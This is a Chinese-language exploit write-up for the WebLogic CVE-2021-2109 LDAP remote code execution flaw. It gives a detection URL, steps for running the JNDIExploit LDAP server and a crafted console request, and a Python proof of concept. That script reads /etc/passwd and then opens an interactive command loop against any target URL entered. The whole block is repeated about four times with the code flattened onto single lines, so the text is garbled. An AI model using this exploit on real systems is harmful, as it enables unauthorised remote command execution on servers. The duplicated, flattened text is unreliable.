# Weblogic LDAP 遠程代碼執行漏洞 CVE-2021-2109
==漏洞影響==
WebLogic Server 10.3.6.0.0
WebLogic Server 12.1.3.0.0
WebLogic Server 12.2.1.3.0
WebLogic Server 12.2.1.4.0
WebLogic Server 14.1.1.0.0
==漏洞環境==
git clone https://github.com/vulhub/vulhub.git
cd vulhub/weblogic/CVE-2020-14882
docker-compose up -d
==漏洞檢測==
訪問
http://xxx.xxx.xxx.xxx:7001/console/css/%252e%252e%252f/consolejndi.portal
如果有頁面未授權可訪問,且在影響範圍內可能存在漏洞。
==漏洞利用==
下載 [JNDIExploit https://github.com/feihong-cs/JNDIExploit]
java -jar JNDIExploit-v1.11.jar -i xxx.xxx.xxx.xxx
(xxx.xxx.xxx.xxx表示服務端IP地址);
然後配合 Weblogic未授權範圍 命令執行:
/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://xxx.xxx.xxx;xxx:1389/Basic/WeblogicEcho;AdminServer%22)
注意 ldap://xxx.xxx.xxx;xxx:1389/Basic/WeblogicEcho
這裡 LDAP服務器地址第三個分隔符號為 ;
==POC==
注意參數格式 Ldap >>> ldap://xxx.xxx.xxx;xxx:1389 中的分號
如果使用其他的利用Ldap服務請自行更改 POC關鍵字
此POC僅僅檢驗有未授權的情況
import requests import sys import re requests.packages.urllib3.disable_warnings() from requests.packages.urllib3.exceptions import InsecureRequestWarning def title(): print('+------------------------------------------') print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m') print('+ \033[34mVersion: Weblogic 多个版本 \033[0m') print('+ \033[36m使用格式: python3 poc.py \033[0m') print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m') print('+ \033[36mLDAP >>> ldap://xxx.xxx.xxx;xxx:1389 \033[0m') print('+------------------------------------------') def POC_1(target_url, ldap_url, cmd): vuln_url = target_url + "/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22{}/Basic/WeblogicEcho;AdminServer%22)".format(ldap_url) print('\033[36m[o] 正在请求: {}'.format(vuln_url)) headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", "cmd": cmd } try: response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) if "root:" in response.text: print("\033[32m[o] 目标{}存在漏洞 \033[0m".format(target_url)) print("\033[32m[o] 响应为:\n{} \033[0m".format(response.text)) else: print("\033[31m[x] 命令执行失败 \033[0m") sys.exit(0) except Exception as e: print("\033[31m[x] 请检查参数和Ldap服务是否正确 \033[0m", e) def POC_2(target_url, ldap_url, cmd): vuln_url = target_url + "/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22{}/Basic/WeblogicEcho;AdminServer%22)".format(ldap_url) print('\033[36m[o] 正在请求: {}'.format(vuln_url)) headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", "cmd": cmd } try: response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) print("\033[32m[o] 响应为:\n{} \033[0m".format(response)) except Exception as e: print("\033[31m[x] 请检查参数和Ldap服务是否正确 \033[0m", e) if __name__ == '__main__': title() target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m")) ldap_url = str(input("\033[35mLdap >>> \033[0m")) POC_1(target_url, ldap_url, cmd="cat /etc/passwd") while True: cmd = input("\033[35mCmd >>> \033[0m") if cmd == "exit": sys.exit(0) else: POC_2(target_url, ldap_url, cmd)
==漏洞影響==
WebLogic Server 10.3.6.0.0
WebLogic Server 12.1.3.0.0
WebLogic Server 12.2.1.3.0
WebLogic Server 12.2.1.4.0
WebLogic Server 14.1.1.0.0
==漏洞環境==
git clone https://github.com/vulhub/vulhub.git
cd vulhub/weblogic/CVE-2020-14882
docker-compose up -d
==漏洞檢測==
訪問
http://xxx.xxx.xxx.xxx:7001/console/css/%252e%252e%252f/consolejndi.portal
如果有頁面未授權可訪問,且在影響範圍內可能存在漏洞。
==漏洞利用==
下載 [https://github.com/feihong-cs/JNDIExploit JNDIExploit]
java -jar JNDIExploit-v1.11.jar -i xxx.xxx.xxx.xxx
(xxx.xxx.xxx.xxx表示服務端IP地址);
然後配合 Weblogic未授權範圍 命令執行:
/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://xxx.xxx.xxx;xxx:1389/Basic/WeblogicEcho;AdminServer%22)
注意 ldap://xxx.xxx.xxx;xxx:1389/Basic/WeblogicEcho
這裡 LDAP服務器地址第三個分隔符號為 ;
==POC==
注意參數格式 Ldap >>> ldap://xxx.xxx.xxx;xxx:1389 中的分號
如果使用其他的利用Ldap服務請自行更改 POC關鍵字
此POC僅僅檢驗有未授權的情況
import requests import sys import re requests.packages.urllib3.disable_warnings() from requests.packages.urllib3.exceptions import InsecureRequestWarning def title(): print('+------------------------------------------') print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m') print('+ \033[34mVersion: Weblogic 多个版本 \033[0m') print('+ \033[36m使用格式: python3 poc.py \033[0m') print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m') print('+ \033[36mLDAP >>> ldap://xxx.xxx.xxx;xxx:1389 \033[0m') print('+------------------------------------------') def POC_1(target_url, ldap_url, cmd): vuln_url = target_url + "/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22{}/Basic/WeblogicEcho;AdminServer%22)".format(ldap_url) print('\033[36m[o] 正在请求: {}'.format(vuln_url)) headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", "cmd": cmd } try: response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) if "root:" in response.text: print("\033[32m[o] 目标{}存在漏洞 \033[0m".format(target_url)) print("\033[32m[o] 响应为:\n{} \033[0m".format(response.text)) else: print("\033[31m[x] 命令执行失败 \033[0m") sys.exit(0) except Exception as e: print("\033[31m[x] 请检查参数和Ldap服务是否正确 \033[0m", e) def POC_2(target_url, ldap_url, cmd): vuln_url = target_url + "/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22{}/Basic/WeblogicEcho;AdminServer%22)".format(ldap_url) print('\033[36m[o] 正在请求: {}'.format(vuln_url)) headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", "cmd": cmd } try: response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) print("\033[32m[o] 响应为:\n{} \033[0m".format(response)) except Exception as e: print("\033[31m[x] 请检查参数和Ldap服务是否正确 \033[0m", e) if __name__ == '__main__': title() target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m")) ldap_url = str(input("\033[35mLdap >>> \033[0m")) POC_1(target_url, ldap_url, cmd="cat /etc/passwd") while True: cmd = input("\033[35mCmd >>> \033[0m") if cmd == "exit": sys.exit(0) else: POC_2(target_url, ldap_url, cmd)
==漏洞影響==
WebLogic Server 10.3.6.0.0
WebLogic Server 12.1.3.0.0
WebLogic Server 12.2.1.3.0
WebLogic Server 12.2.1.4.0
WebLogic Server 14.1.1.0.0
==漏洞環境==
git clone https://github.com/vulhub/vulhub.git
cd vulhub/weblogic/CVE-2020-14882
docker-compose up -d
==漏洞檢測==
訪問
http://xxx.xxx.xxx.xxx:7001/console/css/%252e%252e%252f/consolejndi.portal
如果有頁面未授權可訪問,且在影響範圍內可能存在漏洞。
==漏洞利用==
下載 [https://github.com/feihong-cs/JNDIExploit JNDIExploit]
java -jar JNDIExploit-v1.11.jar -i xxx.xxx.xxx.xxx
(xxx.xxx.xxx.xxx表示服務端IP地址);
然後配合 Weblogic未授權範圍 命令執行:
/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://xxx.xxx.xxx;xxx:1389/Basic/WeblogicEcho;AdminServer%22)
注意 ldap://xxx.xxx.xxx;xxx:1389/Basic/WeblogicEcho
這裡 LDAP服務器地址第三個分隔符號為 ;
==POC==
注意參數格式 Ldap >>> ldap://xxx.xxx.xxx;xxx:1389 中的分號
如果使用其他的利用Ldap服務請自行更改 POC關鍵字
此POC僅僅檢驗有未授權的情況
import requests import sys import re requests.packages.urllib3.disable_warnings() from requests.packages.urllib3.exceptions import InsecureRequestWarning def title(): print('+------------------------------------------') print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m') print('+ \033[34mVersion: Weblogic 多个版本 \033[0m') print('+ \033[36m使用格式: python3 poc.py \033[0m') print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m') print('+ \033[36mLDAP >>> ldap://xxx.xxx.xxx;xxx:1389 \033[0m') print('+------------------------------------------') def POC_1(target_url, ldap_url, cmd): vuln_url = target_url + "/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22{}/Basic/WeblogicEcho;AdminServer%22)".format(ldap_url) print('\033[36m[o] 正在请求: {}'.format(vuln_url)) headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", "cmd": cmd } try: response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) if "root:" in response.text: print("\033[32m[o] 目标{}存在漏洞 \033[0m".format(target_url)) print("\033[32m[o] 响应为:\n{} \033[0m".format(response.text)) else: print("\033[31m[x] 命令执行失败 \033[0m") sys.exit(0) except Exception as e: print("\033[31m[x] 请检查参数和Ldap服务是否正确 \033[0m", e) def POC_2(target_url, ldap_url, cmd): vuln_url = target_url + "/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22{}/Basic/WeblogicEcho;AdminServer%22)".format(ldap_url) print('\033[36m[o] 正在请求: {}'.format(vuln_url)) headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", "cmd": cmd } try: response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) print("\033[32m[o] 响应为:\n{} \033[0m".format(response)) except Exception as e: print("\033[31m[x] 请检查参数和Ldap服务是否正确 \033[0m", e) if __name__ == '__main__': title() target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m")) ldap_url = str(input("\033[35mLdap >>> \033[0m")) POC_1(target_url, ldap_url, cmd="cat /etc/passwd") while True: cmd = input("\033[35mCmd >>> \033[0m") if cmd == "exit": sys.exit(0) else: POC_2(target_url, ldap_url, cmd)
==參考==
https://mp.weixin.qq.com/s/P6xTm3Ww4llbbd9CIm9spQ==漏洞影響==
WebLogic Server 10.3.6.0.0
WebLogic Server 12.1.3.0.0
WebLogic Server 12.2.1.3.0
WebLogic Server 12.2.1.4.0
WebLogic Server 14.1.1.0.0
==漏洞環境==
git clone https://github.com/vulhub/vulhub.git cd vulhub/weblogic/CVE-2020-14882 docker-compose up -d
==漏洞檢測==
訪問
http://xxx.xxx.xxx.xxx:7001/console/css/%252e%252e%252f/consolejndi.portal
如果有頁面未授權可訪問,且在影響範圍內可能存在漏洞。
==漏洞利用==
下載 [https://github.com/feihong-cs/JNDIExploit JNDIExploit]
java -jar JNDIExploit-v1.11.jar -i xxx.xxx.xxx.xxx
(xxx.xxx.xxx.xxx表示服務端IP地址);
然後配合 Weblogic未授權範圍 命令執行:
/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://xxx.xxx.xxx;xxx:1389/Basic/WeblogicEcho;AdminServer%22)
注意 ldap://xxx.xxx.xxx;xxx:1389/Basic/WeblogicEcho
這裡 LDAP服務器地址第三個分隔符號為 ;
==POC==
注意參數格式 Ldap >>> ldap://xxx.xxx.xxx;xxx:1389 中的分號
如果使用其他的利用Ldap服務請自行更改 POC關鍵字
此POC僅僅檢驗有未授權的情況
import requests import sys import re requests.packages.urllib3.disable_warnings() from requests.packages.urllib3.exceptions import InsecureRequestWarning def title(): print('+------------------------------------------') print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m') print('+ \033[34mVersion: Weblogic 多个版本 \033[0m') print('+ \033[36m使用格式: python3 poc.py \033[0m') print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx \033[0m') print('+ \033[36mLDAP >>> ldap://xxx.xxx.xxx;xxx:1389 \033[0m') print('+------------------------------------------') def POC_1(target_url, ldap_url, cmd): vuln_url = target_url + "/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22{}/Basic/WeblogicEcho;AdminServer%22)".format(ldap_url) print('\033[36m[o] 正在请求: {}'.format(vuln_url)) headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", "cmd": cmd } try: response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) if "root:" in response.text: print("\033[32m[o] 目标{}存在漏洞 \033[0m".format(target_url)) print("\033[32m[o] 响应为:\n{} \033[0m".format(response.text)) else: print("\033[31m[x] 命令执行失败 \033[0m") sys.exit(0) except Exception as e: print("\033[31m[x] 请检查参数和Ldap服务是否正确 \033[0m", e) def POC_2(target_url, ldap_url, cmd): vuln_url = target_url + "/console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22{}/Basic/WeblogicEcho;AdminServer%22)".format(ldap_url) print('\033[36m[o] 正在请求: {}'.format(vuln_url)) headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", "cmd": cmd } try: response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5) print("\033[32m[o] 响应为:\n{} \033[0m".format(response)) except Exception as e: print("\033[31m[x] 请检查参数和Ldap服务是否正确 \033[0m", e) if __name__ == '__main__': title() target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m")) ldap_url = str(input("\033[35mLdap >>> \033[0m")) POC_1(target_url, ldap_url, cmd="cat /etc/passwd") while True: cmd = input("\033[35mCmd >>> \033[0m") if cmd == "exit": sys.exit(0) else: POC_2(target_url, ldap_url, cmd)
==參考==
https://mp.weixin.qq.com/s/P6xTm3Ww4llbbd9CIm9spQ
请登录后查看评论内容